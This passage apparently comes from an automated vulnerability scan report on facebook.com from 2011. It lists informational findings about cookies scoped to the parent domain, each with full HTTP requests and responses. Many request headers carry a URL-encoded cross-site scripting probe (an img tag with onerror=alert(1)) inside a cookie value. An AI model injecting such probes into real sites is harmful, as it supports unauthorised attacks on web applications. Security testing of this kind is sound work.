Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.38. http://www.facebook.com/fayse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.39. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.40. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.41. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.42. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.43. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.44. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
  • next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0


10.45. http://www.facebook.com/izaOllie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.46. http://www.facebook.com/jezzas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.47. http://www.facebook.com/kimberly.christ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.48. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.49. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.50. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

